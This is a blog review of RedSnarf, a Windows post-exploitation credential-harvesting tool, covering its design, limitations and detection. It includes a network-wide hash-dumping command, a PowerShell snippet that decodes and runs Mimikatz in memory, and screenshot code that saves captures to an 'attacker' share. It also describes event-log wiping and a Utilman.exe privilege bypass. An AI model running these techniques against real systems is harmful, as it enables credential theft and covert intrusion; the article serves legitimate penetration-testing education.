Back to Articles
Cybersecurity

RedSnarf: The Post-Exploitation Credential Harvester That Time (Almost) Forgot

★ 1.2k PowerShell 88/100 May 14, 2026
Rob Ragan
Rob Ragan Offensive security researcher and AI agent architect. Founder of Starlog.
[ View on GitHub ]

RedSnarf: The Post-Exploitation Credential Harvester That Time (Almost) Forgot

Hook

In penetration testing, the hardest part isn't breaking in—it's what you do in the first 15 minutes afterward. RedSnarf tries to answer that question by automating the entire credential harvesting playbook against Windows networks, assuming you've already got one valid set of credentials.

Context

Back in the mid-2010s, post-exploitation in Windows environments meant juggling a dozen different tools: Mimikatz for LSASS dumping, Impacket's secretsdump.py for remote SAM extraction, NTDSUtil for domain controller compromise, and custom scripts for everything else. Each technique required different syntax, different network protocols, and different operational considerations. Penetration testers spent valuable time context-switching between tools when they should have been focused on understanding the environment they'd compromised.

RedSnarf emerged from NCC Group as a Python orchestration layer that unified these disparate techniques behind a single command-line interface. Instead of remembering whether you need impacket-secretsdump or impacket-wmiexec, you point RedSnarf at a target with credentials and specify what you want: hashes, Kerberos tickets, screenshots, or full Active Directory compromise. The tool handles protocol selection, credential formatting, and result parsing. It's less a novel exploitation technique and more a time-saving wrapper around the Windows offensive security ecosystem—essentially a Makefile for credential theft.

Technical Insight

External Tools

credentials + targets

authenticated session

registry access

memory extraction

DC replication

hashes

plaintext/hashes

domain hashes

shells out to

executes

RedSnarf CLI

SMB Authentication Layer

Attack Router

SAM/LSA Dump

Mimikatz/ProcDump

DCSync via Impacket

Credential Store

Impacket Library

PowerShell Scripts
System architecture — auto-generated

RedSnarf's architecture is deceptively simple: it's a Python command-line tool that shells out to PowerShell scripts and third-party binaries, coordinating attacks through SMB connections. The core workflow involves establishing an authenticated SMB session using provided credentials (password or NTLM hash), determining available attack vectors based on target system privileges, and executing credential extraction routines that dump results to local files.

The tool's bread-and-butter operation is network-wide hash dumping. When you provide a CIDR range and credentials, RedSnarf iterates through hosts, establishing SMB connections and executing remote credential extraction:

# Simplified example of RedSnarf's approach
python redsnarf.py -H 192.168.1.0/24 -u administrator -p Password123 \
  -C all -cG golden -cM

This command tells RedSnarf to scan the entire /24 subnet, authenticate as administrator, grab all credentials (-C all), attempt a Golden Ticket attack (-cG), and extract credentials via Mimikatz (-cM). Behind the scenes, RedSnarf uses Impacket's SMBConnection to establish sessions, then leverages multiple extraction techniques:

For SAM/LSA dumping on member servers, it either uses Impacket's secretsdump.py directly or invokes CredDump7 (a Python port of pwdump) to parse registry hives. For domain controllers, the tool offers two paths: online DCSync via Impacket's drsuapi implementation (mimicking domain controller replication to extract password hashes) or offline extraction by copying NTDS.dit and SYSTEM hive files using Volume Shadow Copy Service.

The Mimikatz integration reveals RedSnarf's operational philosophy. Rather than uploading Mimikatz.exe directly (easily detected), it base64-encodes an obfuscated PowerShell script that reflectively loads Mimikatz into memory:

# RedSnarf's approach (simplified)
$code = [System.Text.Encoding]::UTF8.GetString(
  [System.Convert]::FromBase64String($EncodedMimikatz)
)
Invoke-Expression $code
Invoke-Mimikatz -DumpCreds

This PowerShell wrapper gets executed remotely via WMI or scheduled tasks, writes output to a network share or file, then cleans up event logs using wevtutil to reduce forensic artifacts. The tool even includes UAC bypass routines for scenarios where you have user credentials but need SYSTEM-level access—it copies the Windows accessibility binary Utilman.exe, replaces it with cmd.exe, then triggers it through remote registry manipulation.

Beyond credential theft, RedSnarf includes reconnaissance modules that hunt for logged-in users across the network (useful for targeting high-value accounts), capture screenshots from active sessions using PowerShell's Windows Forms APIs, and even record desktop sessions. The screenshot functionality is particularly clever:

# Remote screenshot capture technique
$bmp = New-Object System.Drawing.Bitmap($screen.Bounds.Width, 
  $screen.Bounds.Height)
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($screen.Bounds.Location, 
  [System.Drawing.Point]::Empty, $screen.Bounds.Size)
$bmp.Save("\\attacker\share\screenshot.png")

This code executes in the context of the logged-in user's session, capturing whatever's on-screen—useful for understanding what applications are running or identifying sensitive data exposure.

The tool's hash spraying capability deserves mention. If you've compromised one account's NTLM hash, you can test it against multiple systems without needing plaintext passwords. RedSnarf uses pass-the-hash techniques via Impacket to authenticate using only the hash value, enabling lateral movement without cracking passwords—a significant time-saver in large environments where password reuse is common.

Gotcha

RedSnarf's biggest limitation is that it requires valid credentials to do anything. This isn't a vulnerability scanner or exploit framework—you need a foothold first. For penetration tests starting from external reconnaissance, RedSnarf only becomes relevant after you've phished credentials, cracked a password, or exploited an application vulnerability to gain initial access. It's a post-exploitation tool through and through.

The tool's reliance on external dependencies creates practical problems. It requires specific versions of Impacket (v0.9.16-dev), exact file paths for Mimikatz and ProcDump binaries, and assumes a particular directory structure. Breaking changes in Impacket's API or unavailable download links for legacy CredDump7 builds can render functionality inoperable. The GitHub repository's last significant updates date from 2019-2020, meaning compatibility with Windows 10 21H2+, Windows 11, or Server 2022 is uncertain. Modern defensive features like Credential Guard (which isolates LSA secrets in a virtualized environment inaccessible to Mimikatz), Windows Defender Application Control, and enhanced AMSI integration may block RedSnarf's techniques entirely.

Detection is another concern. While RedSnarf includes event log clearing and attempts PowerShell obfuscation, modern EDR solutions monitor SMB connections, WMI execution, scheduled task creation, and PowerShell script blocks. The tool's reliance on well-known attack patterns (Mimikatz strings, DCSync network signatures) makes it easier to detect than custom tooling. Forensically, even with log clearing, artifacts remain in SRUM databases, prefetch files, and registry transaction logs. In security-conscious environments with mature monitoring, RedSnarf's activities would likely trigger alerts within minutes.

Verdict

Use RedSnarf if you're performing penetration tests in environments with basic security controls (standalone antivirus, minimal logging, older Windows versions) and need to rapidly escalate from initial credentials to domain administrator. It's genuinely useful for automating repetitive credential dumping tasks across multiple systems during time-limited assessments, and its unified interface reduces cognitive overhead when you're juggling multiple attack paths. It also serves as an excellent educational tool for understanding the complete Windows post-exploitation workflow—reading through its code teaches you how different credential stores interact and which techniques apply in which scenarios. Skip RedSnarf if you're red-teaming against environments with EDR deployment, Credential Guard, or active security operations centers. The tool's age and lack of active development mean you'll likely encounter broken functionality on modern Windows builds, and its detection profile is too high for operations requiring stealth. For those scenarios, invest time in learning CrackMapExec/NetExec or building custom tooling with better evasion characteristics. Also skip it if you need a supported, documented tool—expect to debug dependencies and adapt techniques yourself.

// RELATED

Cybersecurity

Caldera: When Your Red Team Needs a Planning Algorithm, Not Just Another C2

By Rob Ragan ★ 7.0k Unknown May 24, 2026
Cybersecurity

Caldera: Building Adversary Emulation with Fact-Based Planning Engines

By Rob Ragan ★ 7.0k Unknown May 24, 2026
Cybersecurity

Inside Mathias Bynens' Dotfiles: The Blueprint for 30,000 macOS Developer Environments

By Rob Ragan ★ 31.3k Unknown May 15, 2026
Cybersecurity

Glow: Why Rendering Markdown in the Terminal Shouldn't Require a Browser

By Rob Ragan ★ 25.2k Unknown May 15, 2026
Cybersecurity

Caldera: When Your Red Team Needs a Planning Algorithm, Not Just Another C2

By Rob Ragan ★ 7.0k Unknown May 24, 2026
Cybersecurity

Caldera: Building Adversary Emulation with Fact-Based Planning Engines

By Rob Ragan ★ 7.0k Unknown May 24, 2026
Cybersecurity

Inside Mathias Bynens' Dotfiles: The Blueprint for 30,000 macOS Developer Environments

By Rob Ragan ★ 31.3k Unknown May 15, 2026
active-directorypentestingpentesting-windowspythonwindows
// ADD TO YOUR README
Featured on Starlog 
[![Featured on Starlog](https://starlog.is/api/badge/cybersecurity/nccgroup-redsnarf.svg)](https://starlog.is/api/badge-click/cybersecurity/nccgroup-redsnarf)